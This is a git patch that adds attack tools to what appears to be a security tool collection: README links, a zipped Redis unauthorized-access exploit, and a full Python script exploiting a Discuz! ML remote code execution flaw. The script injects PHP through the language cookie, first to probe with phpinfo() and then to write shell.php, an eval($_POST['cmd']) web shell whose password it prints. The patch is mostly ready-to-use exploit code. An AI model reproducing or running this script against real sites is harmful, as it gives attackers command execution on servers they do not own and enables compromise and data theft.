From fdd9fccfc4a987b89813c51798826a5bbfdd01bd Mon Sep 17 00:00:00 2001 From: Mrxn Date: Sat, 1 Aug 2020 14:36:47 +0800 Subject: [PATCH] =?UTF-8?q?add=20Redis=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF?= =?UTF-8?q?=E9=97=AE=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8=E5=B7=A5=E5=85=B7?= =?UTF-8?q?&Discuz!=20ml=20RCE=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8?= =?UTF-8?q?=E5=B7=A5=E5=85=B7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 2 + tools/Redis_Exp-by_PANDA墨森.zip | Bin 0 -> 3864 bytes tools/dz_ml_rce.py | 70 +++++++++++++++++++++++++++++++ 3 files changed, 72 insertions(+) create mode 100644 tools/Redis_Exp-by_PANDA墨森.zip create mode 100644 tools/dz_ml_rce.py diff --git a/README.md b/README.md index 792d098..870ac96 100644 --- a/README.md +++ b/README.md @@ -440,6 +440,8 @@ - [fofa2Xray-一款联合fofa与xray的自动化批量扫描工具,使用Golang编写,适用于windows与linux](https://github.com/piaolin/fofa2Xray) - [CasExp-Apereo CAS 反序列化利用工具](https://github.com/potats0/CasExp) - [C_Shot-shellcode远程加载器](https://github.com/anthemtotheego/C_Shot)|[相关文章](./books/C_shot–shellcode远程加载器.pdf) +- [dz_ml_rce.py-Discuz! ml RCE漏洞利用工具](./tools/dz_ml_rce.py) +- [Redis未授权访问漏洞利用工具](./tools/Redis_Exp-by_PANDA墨森.zip) ## 文章/书籍/教程相关 diff --git a/tools/Redis_Exp-by_PANDA墨森.zip b/tools/Redis_Exp-by_PANDA墨森.zip new file mode 100644 index 0000000000000000000000000000000000000000..42dcd1164b64162ac115fa4aae28782855d6ac8e GIT binary patch literal 3864 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 Gc=|s#B2vZx literal 0 HcmV?d00001 diff --git a/tools/dz_ml_rce.py b/tools/dz_ml_rce.py new file mode 100644 index 0000000..b6e1727 --- /dev/null +++ b/tools/dz_ml_rce.py @@ -0,0 +1,70 @@ +#!/usr/bin/python +# coding=utf-8 + +import requests +import re +from argparse import ArgumentParser + + +class Dz_Ml_RCE: + def __init__(self): + self.headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', + 'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;' + } + + def check(self): + '''漏洞检测''' + self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'") + r = requests.get(url=result.url, headers=self.headers) + if re.search(r'phpinfo\(\)', r.text): + print("[*]Target Is Seem To Be Vulnerable!") + else: + print("[!]Target Is Not Seem To Be Vulnerable!") + + def getshell(self): + shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27' + self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload) + r = requests.get(url=result.url, headers=self.headers) + if re.search(r'Forum - Powered by Discuz!', r.text): + print("[*]Shell Create Successfully!") + print(f"[+]shell:在 {result.url} 同目录下的shell.php 密码:cmd") + else: + print("[!]Shell Create Failed!") + + def run(self): + if result.func == 'check': + self.check() + elif result.func == 'shell': + self.getshell() + else: + print("[!]请选择正确的功能:check(漏洞检测)/shell(直接getshell)!") + + +def main(): + if not result.func: + print("[!]请先使用-f指定可选的功能:check(漏洞检测)/getshell(直接getshell)") + return + else: + Dz_Ml_RCE().run() + + +if __name__ == '__main__': + show = ''' + _____ _ __ __ _ _____ _____ ______ + | __ \ | | | \/ | | | __ \ / ____| ____| + | | | |___| | | \ / | | | |__) | | | |__ + | | | |_ / | | |\/| | | | _ /| | | __| + | |__| |/ /|_| | | | | |____ | | \ \| |____| |____ + |_____//___(_) |_| |_|______| |_| \_\\_____|______| + ______ + |______| + + By PANDA墨森 + ''' + print(show + '\n'*2) + arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森') + arg.add_argument('url', help='目标url,eag:http://www.xxx.com/discuz/upload/forum.php') + arg.add_argument('-f', '--func', help='可选的功能:check(漏洞检测)/shell(直接getshell)', dest='func', type=str) + result = arg.parse_args() + main()